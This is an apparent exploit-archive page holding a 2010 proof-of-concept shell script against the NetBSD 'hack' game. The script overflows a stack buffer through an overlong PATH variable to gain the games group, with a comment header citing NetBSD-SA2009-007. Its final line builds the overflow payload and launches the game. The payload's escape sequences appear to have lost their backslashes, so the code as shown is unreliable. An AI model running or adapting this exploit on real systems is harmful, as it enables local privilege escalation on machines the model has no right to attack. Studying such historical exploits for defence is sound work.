NetBSD 5.0 and below Hack PATH Environment overflow proof of concept

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : NetBSD 5.0 and below Hack PATH Environment overflow proof of concept
# Published : 2010-05-18
# Author : JMIT
# Previous Title : NetBSD 5.0 and below Hack GENOCIDE Environment overflow proof of concept
# Next Title : QtWeb Browser version 3.3 Dos

#!/bin/sh

# NetBSD 5.0 and below Hack PATH Environment overflow proof of concept
# Successfull Exploitation gives guid 100 (games)
# Vulnerable Function is in hack.unix.c
# It is a basic strcpy stack overflow. Such overflows are hard to exploit in
# NetBSD. If you can exploit it successfully feel free to contact me
# Original Advisorie: NetBSD-SA2009-007

# Title: hack rougelike game PATH stack overflow
# Author: JMIT (office@johannesmaria.at)
# Date: 18. May 2010
# Software Link: Contained in all NetBSD Distributions as default
# Version: NetBSD 5.0 and below
# Tested on: NetBSD 5.0-RELEASE
# CVE: Not available. See NetBSD-SA2009-007
# Code:

export PATH=`/usr/pkg/bin/perl -e 'printf("A"x1000);printf("x41xb0xe5xbfxbf"x15);'`:/bin:/usr/bin:/usr/sbin:/sbin:/usr/games && hack